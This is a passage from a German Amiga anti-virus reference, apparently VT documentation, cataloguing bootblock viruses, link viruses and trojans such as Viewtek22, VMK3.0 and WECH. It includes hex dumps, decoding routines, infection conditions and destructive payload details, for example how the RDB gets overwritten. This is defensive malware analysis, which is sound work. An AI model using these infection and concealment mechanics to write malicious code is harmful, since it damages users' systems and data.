  6780.            7765722e 2e2e0000 0022433a 52756e20 wer......"C:Run
  6781.            3e4e494c 3a20433a 44656c65 7465203e >NIL: C:Delete >
  6782.            4e494c3a 204c4942 533a233f 00000003 NIL: LIBS:#?....
  6783.  
  6784.    - USSR492-Virus   BB   Excrement-Clone (Texte geaendert)
  6785.          anderer Name: Sentinel siehe oben
  6786.          Es wird auch der Name USSR 492 verwendet, da aber auf "Sent"
  6787.          im Virus selbst getestet wird, halte ich den Namen Sentinel
  6788.          fuer sinnvoller, zumal dieser Name auch an gleicher Stelle
  6789.          wie EXCREMENT im Original steht.
  6790.  
  6791.    - V1  BB   siehe oben bei EXECUTORS.BB
  6792.  
  6793.    - VC-MakeKey-Trojan    siehe bei WiREFACE-Trojan
  6794.  
  6795.    - VCCofTNT-Virus  BB
  6796.          Graphikausgabe:
  6797.                VCC of TNT
  6798.             ACCESS FORBIDDEN
  6799.          Schreibt VCC9 nach #34(a6)
  6800.          Fordert trackdisk.device NICHT
  6801.          auch KS2.04
  6802.          Schaeden:
  6803.          Schreibt sofort unsinnige Werte aus dem Speicher in den BB
  6804.          und den Root-Block
  6805.          Ergebnis: Not a Dos Disk
  6806.          Empfehlung: sofort loeschen
  6807.          Wird auch als AutoBootingBootProtector V2.0 weitergegeben.
  6808.          Typ 2: Eine technische Meisterleistung. Bravo
  6809.          VCC9 wurde durch $k.. ersetzt.
  6810.                     Orig                       Umbau
  6811.               56434339 002220fc VCC9." .  246bbfd0 002220fc $k..." .
  6812.               ^^^^^^^^                    ^^^^^^^^
  6813.          Die dos.lib wurde an eine andere dafuer aber UNGERADE Stelle im
  6814.          BB verschoben. Das mag der 68000 besonders gerne.
  6815.               00324e75 646f732e .2Nudos.  010f0777 00ef0f00 ...w....
  6816.                        ^^ gerade
  6817.               ff8f03df fc7dffcf ........  4c4c2164 6f732e6c LL!dos.l
  6818.                                                 ^^ ungerade
  6819.  
  6820.    - VERA    File  s.u. bei AntiVirusPrg
  6821.          Ist KEIN Virus !!!! Das Teil macht NICHTS (!!!!) OHNE Rueck-
  6822.          frage.
  6823.  
  6824.  
  6825.    - Vermin  Cool, im Prg DoIo  immer ab $7eb10
  6826.          fuellt nicht benoetigten Platz im BB mit Inhalt von $DFF006 auf.
  6827.          Vermehrung und Schaden: Bootblock
  6828.  
  6829.    - Viewtek22-Installer      File
  6830.          Laenge ungepackt: 93844 Bytes (so liegt er im lha-Archiv)
  6831.          Namensbegruendung: Wird als Viewtek22.lha weitergegeben.
  6832.          keine verbogenen Vektoren
  6833.          Es wurden 2 Hunks an das Original-Viewtek2.1-Prg (Laenge 88944
  6834.          Bytes) angelinkt.
  6835.          Die Programmteile sind teilweise mehrfach codiert.
  6836.          VT versucht beide Hunks auszubauen.
  6837.  
  6838.          1.Hunk: Es duerfte sich um ein Programmteil handeln, das Ver-
  6839.          aenderungen an einer Mailbox vornimmt. FastCall ????
  6840.          vgl. auch LHAV3-BBS-Trojan s.o.
  6841.          Verlaengert ein File um #864 Bytes
  6842.          Keine verbogenen Vektoren
  6843.          Keine Vermehrungsroutine
  6844.          Wird von VT mit 2.Hunk ausgebaut.
  6845.                 Auszug aus dem 1.Hunk (ist uncodiert zu lesen):   
  6846.               533a4861 75707450 66616400 55736572 S:HauptPfad.User
  6847.               2f537973 4f702f55 73657244 6174656e /SysOp/UserDaten
  6848.               00426f78 44617465 6e2f426f 78506172 .BoxDaten/BoxPar
  6849.               616d6574 65720055 7365722f 4b6f7761 ameter.User/Kowa
  6850.               6c736b79 2f2e494e 44455800 55736572 lsky/.INDEX.User
  6851.               2f4b6f77 616c736b 792f2e54 58540041 /Kowalsky/.TXT.A
  6852.               6273656e 64657220 203a204b 46557365 bsender  : KFUse
  6853.               72436865 636b0a42 65747265 66662020 rCheck.Betreff
  6854.          2.Hunk: Das Virusteil
  6855.          Startet ein Task-Programm s.u.
  6856.          Versucht sich an andere Programme zu linken s.u.
  6857.          Hinweis eines Anwenders zum 1.Hunk (Juli 95): Danke
  6858.          1. Auslesen des Hauptpfades
  6859.          2. Auslesen des SysopPsw.
  6860.          3. Auslesen des Dospsw.
  6861.          4. Schreiben der Psw. an den User Kowalsky
  6862.          (KFUserCheck ist ein Tool der Programmiertruppe "Krypton Force")
  6863.  
  6864.  
  6865.    - Viewtek22-Virus
  6866.          KEINE verbogenen Vektoren
  6867.          Startet ein Task-Programm s.u.
  6868.          Versucht sich als 1.Hunk vor andere Programme zu linken.
  6869.          Typ A:
  6870.          Verlaengerung der Programme um 4036 Bytes.
  6871.          Typ B:
  6872.          Verlaengerung der Programme um 4504 Bytes.
  6873.          Sonst keine Schaeden festgestellt.
  6874.          Das Teil hat bei mir NIE eine Meldung ausgegeben.
  6875.          Betroffene Programme (alle im C-Verz.) :
  6876.                 Fileauszug decodiert:
  6877.                        0063 3a7a6f6f 00633a73       .c:zoo.c:s
  6878.           6872696e 6b00633a 69707265 66730063 hrink.c:iprefs.c
  6879.           3a6d6f75 6e740063 3a646d73 00633a73 :mount.c:dms.c:s
  6880.           65747061 74636800 633a7665 7273696f etpatch.c:versio
  6881.           6e00633a 6c686172 6300633a 61726300 n.c:lharc.c:arc.
  6882.           633a6661 73746769 6600633a 76740063 c:fastgif.c:vt.c
  6883.           3a73686f 7700633a 70707368 6f770063 :show.c:ppshow.c
  6884.           3a656400 633a6963 6f6e7800          :ed.c:iconx.
  6885.          Eine Doppelverseuchung soll vermieden werden.
  6886.              Auszug aus der Routine:
  6887.                   eor.l d1,d0
  6888.                   eor.l d2,d0
  6889.                    bne.s ....
  6890.          Diese Routine verhindert (nicht geplant) aber auch die
  6891.          Erstverseuchung von einigen Files (wurde zufaellig ent-
  6892.          deckt beim Versuch mit arc). Einige arc-Versionen wur-
  6893.          den nicht verseucht.
  6894.          Ablauf:
  6895.           Die Filenamensliste (s.o.) wird durchlaufen.
  6896.            Mindestens 9 Blocks frei
  6897.            Medium ist validated
  6898.            File ist ausfuehrbar ($3f3)
  6899.            Filegroesse max. #143360 Bytes
  6900.           Das Protection-LW wird gerettet  (NEU!!!)
  6901.           Das Virusteil wird als 1.Hunk angelinkt.
  6902.           Die folgenden Hunks werden nachgebessert. Da das Teil nicht
  6903.           viele Hunktypen kennt, muss damit gerechnet werden, dass
  6904.           nicht alle verseuchten Files in ALLEN Funktionen arbeits-
  6905.           faehig sind. VT versucht beim Ausbau den Originalzustand
  6906.           wieder herzustellen.
  6907.           File wird zurueckgeschrieben.
  6908.           Gerettetes Protection-LW wird zurueckgeschrieben. (NEU !!!)
  6909.           Falls mind. KS 37, dann wird das Ursprungs-File-Datum mit
  6910.           setfiledate zurueckgeschrieben. (NEU !!!!)
  6911.           Sie koennen also bei der schnellen Durchsicht des C-Ver-
  6912.           zeichnisses ein verseuchtes File nur noch an der Laenge er-
  6913.           kennen und nicht mehr am Datum oder den Protection-Flags.
  6914.  
  6915.    - Viewtek22-Task
  6916.           Name: trackdisk.device  s.u.
  6917.           Wenn Sie also nur ein Disk-LW haben und dennoch zweimal
  6918.           trackdisk.device in der taskliste finden, dann sollten
  6919.           Sie vorsichtig werden.
  6920.           VT versucht das Teil abzuschalten. Sie muessen aber mit
  6921.           einem GURU rechnen.
  6922.           Das Teil selbst aendert sich von Process in Task.
  6923.                    move.b #$1,$8(a0)
  6924.           Grund: unbekannt
  6925.           Nach einem dosdelay (#500), wird jeweils die TaskReady- und
  6926.           TaskWait-Liste durchsucht.
  6927.           Untersucht wird dabei immer $58(a0)  = tc_UserData
  6928.           Ich kenne jetzt EIN Programm, das diesen Zeiger verwendet.
  6929.           Das Viewtek22-Task-Teil schreibt in tc_UserData einen Wert,
  6930.           um sich selbst zu erkennen. Damit wird verhindert, dass bei
  6931.           einem neuen Aufruf des Viewtek22-Virus-Teils neben der Ver-
  6932.           mehrung noch ein trackdisk.device installiert wird.
  6933.           Sonst habe ich KEIN Programm gefunden, das diesen Zeiger
  6934.           verwendet. Ich bitte Sie also um Mithilfe.
  6935.           Sollte tc_UserData leer sein oder das eigene LW enthalten, dann
  6936.           wird in der Taskliste weitergesucht.
  6937.           Der Zeiger in tc_UserData zeigt auf einen Speicherbereich.
  6938.           Dieser Bereich wird nun weiter getestet:
  6939.                         cmp.l #$60064ef9,(a1)
  6940.                         bne ...
  6941.                         cmp.w #$4ef9,$8(a1)
  6942.                         bne ...
  6943.                         move.l $a(a1),d2
  6944.                         sub.l $4(a1),d2
  6945.                         cmp.l #$1e8,d2
  6946.                         bne ...
  6947.           Bitte, wer kennt solche Programme. Ich lerne gern etwas dazu.
  6948.           Meine Vermutung geht in Richtung Mailbox-Prg oder Utility ??
  6949.           Um Ihnen die Suche zu erleichtern, habe ich noch einige Task-
  6950.           teile decodiert (Nicht alle). Vielleicht helfen Ihnen die
  6951.           Texte weiter. Mir sagen sie nichts. Ich vermute, dass in ein
  6952.           Mailbox-Prg eingegriffen werden soll ???
  6953.               decodierte Taskteile:
  6954.                             3151415a 32575358         1QAZ2WSX
  6955.           33454443 3452460a 3151415a 32575358 3EDC4RF.1QAZ2WSX
  6956.           33454443 3435360a                   3EDC456.
  6957.               ;.....
  6958.                                 3151 415a3257           1QAZ2W
  6959.           53583345 44433452 460a3151 415a0a53 SX3EDC4RF.1QAZ.S
  6960.           59535445 4d454245 4e450a45 4449540a YSTEMEBENE.EDIT.
  6961.  
  6962.               decodierter Taskname im Virusteil:
  6963.           62726172 79007472 61636b64 69736b2e brary.trackdisk.
  6964.           64657669 636500                     device.
  6965.  
  6966.  
  6967.    - VIPHS-Virus   BB   BeginIo, Kicktag, KickCheckSum, Vec5, im Prg $6c
  6968.          KS2.04: nein
  6969.          Versucht zu taeuschen im BB durch:
  6970.             ANTIVIRUS 1989 by VIPHS
  6971.          Verwendet den ByteBandit-Code um $20 verschoben und $6c
  6972.          Auswirkungen s.o. bei ByteBandit
  6973.  
  6974.    - VirConSet-Virus  BB   (VirusConstructionSet)
  6975.          immer ab $7F000, Cool $7F0BE, DoIo $7F0D2
  6976.          Fordert trackdisk.device NICHT
  6977.          Schaeden und Vermehrung:
  6978.          in Abhaengigkeit von der Zaehlzelle (5) wird
  6979.           - ein Virus-BB geschrieben oder
  6980.           - mit DisplayAlert ein Text ausgegeben. Schwachpunkt: Intuition-
  6981.             Base wird immer im $C00000-Bereich abgelegt.
  6982.          Die schlimmste Sache:
  6983.          Der BB wird mit dem Programm Virusconstructionset erzeugt.
  6984.          Laenge gepackt (PP): 10192 Bytes
  6985.          Sie werden aufgefordert, einen max 60 Zeichen langen Display-
  6986.          Alert-Text einzugeben. Den erzeugten BB koennen Sie dann auf
  6987.          Disk in DF0: abspeichern.
  6988.          Weiterhin ist noch ein codierter (addi.b #$27,(a0)+) Text im
  6989.          BB vorhanden, der NIE erreicht wird:
  6990.                                  5468 69732056           This V
  6991.            69727573 20776173 206d6164 65207769 irus was made wi
  6992.            74682053 7461724c 69676874 60732056 th StarLight`s V
  6993.            69727573 436f6e73 74727563 74696f6e irusConstruction
  6994.            73536574 2120636f 64656420 6279204d sSet! coded by M
  6995.            41580000                            AX..
  6996.  
  6997.    - VirConSet2-Virus    BB
  6998.          Cool und nach Reset DoIo
  6999.          KS1.3 : ja
  7000.          Fordert trackdisk.device NICHT
  7001.          Schaeden und Vermehrung:
  7002.          Typ A: BB uncodiert
  7003.          Typ B: BB codiert mit  eori.b d0,(a0)+  (immer gleich)
  7004.          Test auf Cool schon verbogen
  7005.          Speicherbedarf mit AllocMem
  7006.          Vermehrung mit DoIo falls lesend auf Block 880 (ist nur bei
  7007.          DD-Disk Rootblock) zugegriffen wird.
  7008.          Falls die Zaehlzelle $7FFF0 den Wert 5 erreicht hat, wird
  7009.          mit DisplayAlert ein Text (mit VirusConstructionSet 2 fest-
  7010.          gelegt) ausgegeben.
  7011.          Weiterhin ist noch ein codierter (eori.l #$aaabacad,(a0)+)
  7012.          Text im BB vorhanden, der NIE erreicht wird:
  7013.                                  2054 68697320            This
  7014.            56495255 53207761 73206372 65617465 VIRUS was create
  7015.            64207769 74682074 68652056 49525553 d with the VIRUS
  7016.            20434f4e 53545255 4354494f 4e205345  CONSTRUCTION SE
  7017.            54204949 2020414c 4c20436f 64652062 T II  ALL Code b
  7018.            79204d61 78206f66 20537461 724c6967 y Max of StarLig
  7019.            68742032 322f342f 31393933 21212100 ht 22/4/1993!!!.
  7020.  
  7021.          Erzeuger: VirusConstructionSet 2
  7022.  
  7023.    - VIRI-Virus  BB    s.o. bei F.I.C.A-VIRI-Clone
  7024.          Nur Text geaendert
  7025.  
  7026.    - VIRUS FIGHTER V1.0  BB  auch mit KS2.04 VKill-Clone   s.u.
  7027.          Prg-Code = VKill
  7028.          DecodierLW geaendert: "1991"  (nuetzt bei VT NICHTS!! )
  7029.          decodierter Text fuer Requester anders:
  7030.             VIRUS FIGHTER V1.0  usw.
  7031.  
  7032.    - VirusHunter (L)   File
  7033.          Empfehlung: loeschen    Laenge gepackt:   2888 Bytes
  7034.                                  Laenge ungepackt: 4528 Bytes
  7035.          Im File ist ungepackt zu lesen:
  7036.            001b0a0d 57656c63 6f6d6520 746f2048 ....Welcome to H
  7037.            61726477 6172652d 56697275 732d4875 ardware-Virus-Hu
  7038.            6e746572 0a0d5665 7273696f 6e203130 nter..Version 10
  7039.            2e323020 6f6e2032 312e3037 2e393220 .20 on 21.07.92
  7040.              ;.....
  7041.            0a0d4368 65636b69 6e672052 6f6d2d56 ..Checking Rom-V
  7042.            656b746f 7273202e 2e2e2052 6f6d2069 ektors ... Rom i
  7043.            7320696e 66656374 65642121 210a0d53 s infected!!!..S
  7044.              ;usw.
  7045.          Hinweis: Im gepackten Zustand koennte es zu Fehlerkennungen
  7046.                   kommen.
  7047.                   Soll ein Gag-Programm sein. Neulinge im Amigabereich
  7048.                   duerften darueber eine andere Meinung haben.
  7049.          Fundort z.B.:
  7050.          CD-Aminet5:AMINET/GAME/GAG/VIRUSHUNTER.LZH
  7051.  
  7052.    - VIRUS PREDATOR BB: anderer und eigentlich falscher Name: Julie s.o.
  7053.  
  7054.    - VIRUS TERMINATOR V6.0    trojanisches Pferd  Mega1-Cr: 1880 Bytes
  7055.                auch KS2.04
  7056.          Versucht durch Text zu taeuschen:
  7057.             VIRUS TERMINATOR V6.0 by Rudolf Neiber (1992)  usw.
  7058.          Installiert in Wirklichkeit im Speicher CHEATER HIJACKER Virus-BB
  7059.             Wird von VT im Speicher als CHEATER HIJACKER erkannt.
  7060.             Sollte von VT im FileTest als VIRUS TERMINATOR 6 erkannt wer-
  7061.             den.
  7062.          Empfehlung: sofort loeschen
  7063.  
  7064.    - Virus V1    immer ab $7EC00  Cool $7ec62, DoIo $7eca8
  7065.          Arbeitet auch mit KS2.04 !
  7066.          Fordert trackdisk.device NICHT !!!
  7067.          Schaeden und Vermehrung:
  7068.          ueber Bootblock
  7069.          sobald die Zaehlzelle den Wert $F erreicht hat:
  7070.          Textausgabe mit Graphics-Routinen
  7071.             dunkler Hintergrund
  7072.             Virus V1 (rot)
  7073.             Wir sind wieder da ahaaa.. (gruen)
  7074.          Der letzte Text ist auch im BB zu lesen
  7075.  
  7076.    - Virusblaster V2.3   ungepackt 9232 Bytes
  7077.          keine Vermehrung, keine Vektoren verbogen,
  7078.          (also von der Definition her KEIN Virus, aber auf Zerstoerung
  7079.          ausgelegt)
  7080.          zerstoert Disk in Df0
  7081.          meldet sich im Cli als AntiVirenProgramm von M&T 7/91
  7082.          einfach loeschen
  7083.          Herkunft: Virusblaster.LZH  27944 Bytes
  7084.             - Doc-File (geaendertes VT2.26doc-File)
  7085.             - Virusblaster   PP   7292 Bytes
  7086.  
  7087.    - virustest    anderer Name: TimeBomber  s.o.
  7088.  
  7089.    - VirusZ1.02  File  Laenge ungepackt: 1148  Clone
  7090.          siehe oben bei CompuPhagozyte 2
  7091.          Hinweis: a) Die Versionsnummer gibt es am 27.12.93 noch gar
  7092.                      nicht.
  7093.                   b) Die Laenge muss das Prg. sofort verraten.
  7094.  
  7095.  
  7096.    - visions-Trojan    Zerstoerung
  7097.          siehe bei: TRUSTNOONE-Trojan
  7098.  
  7099.    - VKill 1.0     anderer Name: Aids, veraendert PutMsg
  7100.            mit FastMem:
  7101.   (loescht j e d e n nicht schreibgeschuetzten Bootblock o h n e Warnung !!!,
  7102.                     auch wenn es ein Orig. Bootblock ist !! )
  7103.            mit nur ChipMem:
  7104.      (schreibt ohne Warnung eigenen Bootblock)
  7105.          EntschluesselungsLW: " KEN"
  7106.  
  7107.    - VMK3.0-Trojan    File  Laenge: 2620 Bytes
  7108.          Sofort loeschen
  7109.          Keine verbogenen Vektoren
  7110.          Keine Vermehrung
  7111.          Versucht durch Cli-Text zu taeuschen.
  7112.          Im File ist zu lesen:   
  7113.           009b3333 6d566972 75734d65 6d4b696c ..33mVirusMemKil
  7114.           6c205633 2e303020 a9204368 72697320 l V3.00 . Chris
  7115.           48616d65 739b6d00 0a436f6c 64436170 Hames.m..ColdCap
  7116.               ;.....
  7117.           00736373 692e6465 76696365 00000b0f .scsi.device....
  7118.          Schadensablauf:
  7119.            Es wird versucht scsi.device Unit 0 zu oeffnen.
  7120.            (d.h. gvpscsi.device u.a. sind NICHT betroffen)
  7121.            a)  Falls nein Vektorausgabe in Cli
  7122.            b)  Falls ja:
  7123.            Block 0 der Festplatte wird eingelesen.
  7124.            Die BlockChecksum wird um 1 erhoeht und das Byte an Stelle
  7125.            $2b um 1 vermindert. Diese Stelle liegt in einem reservierten
  7126.            Bereich (6 Langworte mit je FFFFFFFF). Sollte das Byte $2b
  7127.            noch nicht 0 sein, so wird nur der Block zurueckgeschrieben.
  7128.            (siehe Testauszug unten). Da die Stelle $2b im Moment keine
  7129.            Bedeutung fuer den Hostadapter hat, faellt dem User nichts auf.
  7130.            ABER !!!!
  7131.            Sobald die Stelle $2b den Wert 0 erreicht, wird der Rigid-
  7132.            bereich auf einer Laenge von $19000 = #102400 Bytes ueber-
  7133.            schrieben. Folge: nach dem naechsten Reset bootet ihre Fest-
  7134.            platte nicht mehr.
  7135.            Abhilfe: Da Sie vorsichtig sind, haben Sie natuerlich von dem
  7136.            Rigid-Bereich mit VT ein Backup gezogen, das Sie jetzt zurueck-
  7137.            spielen koennen.
  7138.            Da erwartet wird, dass Sie VMK in die startup-sequence ueber-
  7139.            nehmen (laut Doc), haben Sie 255 Resets frei, bevor das Un-
  7140.            glueck beginnt.
  7141.            Testauszuege mit VT:
  7142.            Rigid-HD-BB-Orig:
  7143.             0000: 5244534b 00000040 334d4847 00000007 RDSK...@3MHG....
  7144.                                           ^^
  7145.             0010: 00000200 00000012 ffffffff 00000001 ................
  7146.             0020: 00000003 ffffffff ffffffff ffffffff ................
  7147.                                           ^^
  7148.            Rigid-HD-BB nach 1.Aufruf:
  7149.             0000: 5244534b 00000040 334d4848 00000007 RDSK...@3MHH....
  7150.                                           ^^
  7151.             0010: 00000200 00000012 ffffffff 00000001 ................
  7152.             0020: 00000003 ffffffff fffffffe ffffffff ................
  7153.                                           ^^  
  7154.            Rigid-HD-BB nach 2.Aufruf:
  7155.             0000: 5244534b 00000040 334d4849 00000007 RDSK...@3MHI....
  7156.                                           ^^
  7157.             0010: 00000200 00000012 ffffffff 00000001 ................
  7158.             0020: 00000003 ffffffff fffffffd ffffffff ................
  7159.                                           ^^
  7160.             usw. .....
  7161.         Hinweis 97-06-29:
  7162.             Es ist ein neues File aufgetaucht.
  7163.             Filename: patch
  7164.             Filelaenge: 2620 Bytes
  7165.             nach FileID: AMIRC 1.53 BETA PATCH
  7166.             Es wurden einige Bytes veraendert.
  7167.             Folge: Das Teil zerstoert jetzt SOFORT !!!!!!
  7168.  
  7169.  
  7170.    - VoxelSvind-Trojan        Zerstoerung
  7171.         Filename: Voxel_Svind.exe
  7172.         Filelaenge: 179860 Bytes
  7173.         Kein verbogener Vektor
  7174.         Nach File-ID: .our.new.demo.  VOXEL SVIND!
  7175.         Am Ende des Files ist zu lesen:
  7176.             2e6c6962 72617279 00000000 00047379 .library......sy
  7177.             733a0000 00012f00 00000005 6c696273 s:..../.....libs
  7178.             3a000000 00012f00 00000002 6c3a0000 :...../.....l:..
  7179.             00012f00 00000002 633a0000 00012f00 ../.....c:..../.
  7180.             00000002 733a0000 00012f00 00000001 ....s:..../.....
  7181.         Ablauf:
  7182.         (Entsprechende Graphikeinstellung vorausgesetzt) Dunkler Hinter-
  7183.         grund, sehr grosse blaue Buchstaben "DEPTH", darunter kleiner
  7184.         mit hellen Buchstaben loading...
  7185.         Zerstoerungsergebnis:
  7186.           Directory "Trashcan"
  7187.             yv{huykviglg                      736
  7188.             rmfy{zxgwdnmhlf                   384
  7189.             wgi{fyiwqyqn                      696
  7190.             ezmuqcpejzohs{xzogdiyrswofufc     380
  7191.             kovjlxrcplq                       340
  7192.             dhnd{tc{mesmmc{onneqosi          1848
  7193.             vuspovrqwot                     17100
  7194.             hjvzxdfnqcyejouxnmkjsx           4964
  7195.             unimurzgmmvisqfgttgjctppodook    5688
  7196.             jlwhtgzpsihgqrzsxhjrvfmcecrcr   18012
  7197.             oiluciiyyki                     39000
  7198.           Directory "libs"
  7199.             xh{rpqlwkph                      2788
  7200.             pnfluhvycwqjsdvjklcu             1876
  7201.           Directory "l"
  7202.             xltiv{senfdsynsjelmkeenxo         876
  7203.             nodxykzogxpvnjcolqpnds           1756
  7204.             mgevumvxuexdoio                   992
  7205.             wgsjkhzjjvepihxlywql             2804
  7206.             rcvkhmlzn{dcnygupoqkyst          3412
  7207.             rceiwppeiellllyckrjkz            3112
  7208.             ome{wkfd{xycrjmxeu               6464
  7209.             sxyls{eelkioxwd                     7
  7210.           Directory "s"
  7211.             qy{vuzxtkduulejryw{qjql          1364
  7212.           Directory "c" is empty
  7213.         Es werden also die Filenamen geaendert. Weiterhin werden Files
  7214.         zwischen den Subdirs verschoben. Beispiele: Trashcan war vor dem
  7215.         Test leer und c: enthielt mehrere Files. Oder: Das File in l:
  7216.         mit der Laenge 7 ist in Wirklichkeit die startup-sequence und
  7217.         war in s: . Die Files werden also aus bestimmten Subdirs (s.o.)
  7218.         geholt und teilweise in beliebigen Subdirs (bei mir z.B. Trashcan
  7219.         und/oder devs) abgelegt. Ich sehe da keine Reparaturmoeglichkeit,
  7220.         die in einem "vernuenftigen" Zeitaufwand durchfuehrbar ist.
  7221.         VT bietet fuer VoxelSvind-Trojan Loeschen an.
  7222.  
  7223.  
  7224.    - VScan-BBS-Trojan    File  Loeschen
  7225.         Filename: vscan
  7226.         KEINE Vermehrung
  7227.         KEINE verbogenen Vektoren
  7228.         Laenge: 37896 Bytes
  7229.         Fundort z.B.:  CD-SAAR2:ARCHIVE/200_299/SAAR_203.LHA
  7230.         Mit der 4EB9-Methode wurde vor VScan ein Teil gelinkt, das
  7231.         BBS manipulieren soll.
  7232.         Trojanteil gepackt:  5344 Bytes
  7233.         Trojanteil entpackt: 8140 Bytes
  7234.         Im entpackten Trojanteil ist zu lesen:
  7235.                                        42425300             BBS.
  7236.             44483000 44483100 44483000 44483100 DH0.DH1.DH0.DH1.
  7237.             4242533a 00444830 3a424253 2f004448 BBS:.DH0:BBS/.DH
  7238.             313a4242 532f0044 48303a00 4448313a 1:BBS/.DH0:.DH1:
  7239.             ;......
  7240.             803c6600 fdc04e5d 4e752573 436f6e66 .<f...N]Nu%sConf
  7241.             69672564 00720025 734d7367 42617365 ig%d.r.%sMsgBase
  7242.             2f486561 64657266 696c6500 61005000 /Headerfile.a.P.
  7243.             25737573 65722e64 61746100 72002573 %suser.data.r.%s
  7244.             4d736742 6173652f 31006100 43752073 MsgBase/1.a.Cu s
  7245.         Es koennte sich um eine DEVIL-Variante (siehe oben) handeln.
  7246.         VT bietet nur loeschen an, da der VScan-Programmierer selbst
  7247.         in spaeteren Docs schreibt:
  7248.         5.05: *** WARNING *** This is a bogus version not made by myself!
  7249.               Avoid this one at all costs!
  7250.  
  7251.  
  7252.    - VT-Faster Virus   File  CompuPhagozyte 4 - Clone  s.o.
  7253.         So ein Programm habe ich nie geschrieben.
  7254.  
  7255.    - WAFT  BB   Cool, DoIo  auch mit KS2.04 Vermehrung
  7256.          Teile des BB`s codiert mit eori.b #-$31,(a0)+
  7257.             ergibt u.a. Text: W A F T  usw
  7258.          Vermehrung u. Schaeden:
  7259.             - BB
  7260.             - DisplayAlert
  7261.             - sucht Screen- u. Windowstruktur
  7262.  
  7263.    - WAHNFRIED  BB   Cool immer $7F0D8   PutMsg immer $7F0DE
  7264.          KS 2.06: ja
  7265.          fordert trackdisk.device  NICHT
  7266.          Namensbegruendung:
  7267.          im BB ist immer zu lesen
  7268.            20574148 4E465249 45442053 5452494B  WAHNFRIED STRIK
  7269.            45532041 4741494E 20212120 20202020 ES AGAIN !!
  7270.          Vermehrung:
  7271.         ueber BB
  7272.            Allerdings ist ein vermehrter BB nicht mehr bootfaehig,
  7273.            da die BB-CheckSum nicht nachgebessert wird.
  7274.          Schaeden:
  7275.        Eine Zaehlzelle wird bei der Aktivierung des Viruses mit
  7276.            dem Wert $14 beschrieben. Sobald in der Zaehlzelle der
  7277.            Wert 0 erreicht wird, wird mit DisplayAlert ein Text ausge-
  7278.            geben. Dieser Text wird im Speicher decodiert mit:
  7279.                           eori.b #$a7,d0
  7280.               move.b d0,(a1)+
  7281.            Text:
  7282.            Hardware Failure    Press left mouse button to continue
  7283.                    Guru Meditation    #00000015.00C03L12
  7284.                    Hooligen-Bits randalieren im Datenbus!
  7285.                                                       Gruß Erich!
  7286.  
  7287.    - Warhawk   Cool, im Prg. DoIo, liegt immer ab $7e600
  7288.          Fordert trackdisk.device nicht
  7289.          Clone: 04.03.92  Text entfernt
  7290.          Clone: RAF-Virus, LOVEMACHINE-Virus, MAAS  s.o.
  7291.          Das Virusteil sichert den eigenen Speicherbereich NICHT. Es
  7292.          kann also ueberschrieben werden.
  7293.          Im BB ist zu lesen:
  7294.                         5741 52484157 4b205341       WARHAWK SA
  7295.            5953203a 204b494c 4c494e47 20594f55 YS : KILLING YOU
  7296.  
  7297.    - Warshaw Avenger   BeginIo, KickTag, KickChechSum, SumKickData
  7298.          grosse Aehnlichkeiten mit Lamer, BB aber unverschluesselt
  7299.          schreibt je nach Zaehlerstand BB oder schreibt in einen
  7300.          Diskblock (Lage je nach $dff006) $55 x Warsaw und 1 x !! .
  7301.  
  7302.    - WAWE-Trojan
  7303.          Ueberschreibt user.data
  7304.          Keine verbogenen Vektoren
  7305.          Wurde mit der HunkLab-Methode (s.o.) an MACK angehaengt.
  7306.          Im File ist zu lesen:
  7307.            00000003 57415745 22390000 00984eae ....WAWE"9....N.
  7308.            ffdc224e 2c790000 00044eae fe62203c .."N,y....N..b <
  7309.            00000000 4e754e75 00000000 75736572 ....NuNu....user
  7310.            2e646174 6100646f 732e6c69 62726172 .data.dos.librar
  7311.          Das Wort "WAWE" ergibt sich zufaellig durch zwei Befehle.
  7312.          Zerstoerung:
  7313.          Es wird nach user.data gesucht und dieses File dann mit
  7314.          Speichermuell (Lage abhaengig von $DFF006) ueberschrieben.
  7315.          Das File ist NICHT zu erkennen und kann auch NICHT gerettet
  7316.          werden.
  7317.          VT bietet Ausbau an und es sollte ein lauffaehiges MACK-
  7318.          File uebrig bleiben.
  7319.  
  7320.    - WBPrefs-Virus   File
  7321.          siehe oben bei 666!-Trojan
  7322.  
  7323.    - WECH-LVirus      File  Link und Zerstoerung
  7324.          Fileverlaengerung: 952 Bytes
  7325.          Verbogener Vektor: LoadSeg
  7326.          Zusaetzlich wird auch LastAlert veraendert
  7327.          Resetfest: Nein
  7328.          Link hinter den ersten Hunk.
  7329.          VT versucht Loadseg im Speicher zurueckzusetzen.
  7330.          VT versucht den Linkteil aus einem File auszubauen.
  7331.          Speicherverankerung:
  7332.            - LastAlert geaendert auf 00FFFFFF, 01FFFFFF, 02FFFFFF usw.
  7333.            - LoadSeg wird verbogen
  7334.          Zerstoerung (mit Absicht):
  7335.            Sobald LastAlert und $DFF006 einen bestimmten Wert haben, wird
  7336.            der Fileanfang ueberschrieben.
  7337.            picture.datatype-zerst:
  7338.             00: 57454348 57454348 57454348 57454348 WECHWECHWECHWECH
  7339.             10: 57454348 57454348 57454348 57454348 WECHWECHWECHWECH
  7340.             20: 57454348 57454348 57454348 00040000 WECHWECHWECH....
  7341.            Diese Files koennen NICHT gerettet werden.
  7342.          Vermehrungsbedingungen:
  7343.            - File ist noch nicht verseucht (Test mit SetComment)
  7344.            - Filename enthaelt nicht "-",".l"
  7345.            - File ausfuehrbar (3F3)
  7346.            - 3E9-Hunk wird gefunden
  7347.            - Einbauvarianten des Sprungs in das LinkTeil:
  7348.              - RTS am Hunkende soll zu NOP werden (im Test NIE gelungen)
  7349.              - RTS 0000 am Hunkende wird zu NOPNOP
  7350.              - RTS nicht genau am Hunkende wird zu Bra.s
  7351.              - 4EAEwxyz im Hunk wird zu 4EBA-Virus
  7352.          Das Teil meldet sich nicht.
  7353.          Hinweise:
  7354.            - Eine Syquest war nach 15 Minuten unbrauchbar.
  7355.            - Beim gewollten Linkvorgang entstanden Files OHNE Sprungbe-
  7356.              fehl.                                          
  7357.            - Beim gewollten Linkvorgang entstanden Files mit defektem
  7358.              Linkteil.
  7359.            - Kein Test auf KS1.3 (LoadSeg)
  7360.            - Verwendet ungerade Adressen
  7361.            - Verwechselt wahrscheinlich $80(FIBlock) mit $7c(FIBlock)
  7362.              Vermutung insgesamt: Anfaenger ?????
  7363.  
  7364.    - WiREFACE-Varianten nach VT:
  7365.          Meist wird mit der 4EB9-Methode gearbeitet. Der Name WiREFACE
  7366.          wurde aus den decodierten Texten abgeleitet. Eine Ausnahme:
  7367.          in ComKiller ist zu lesen WIREFIRE
  7368.            - Typ A
  7369.              Trojanteil allein 2 Hunks     5852 Bytes
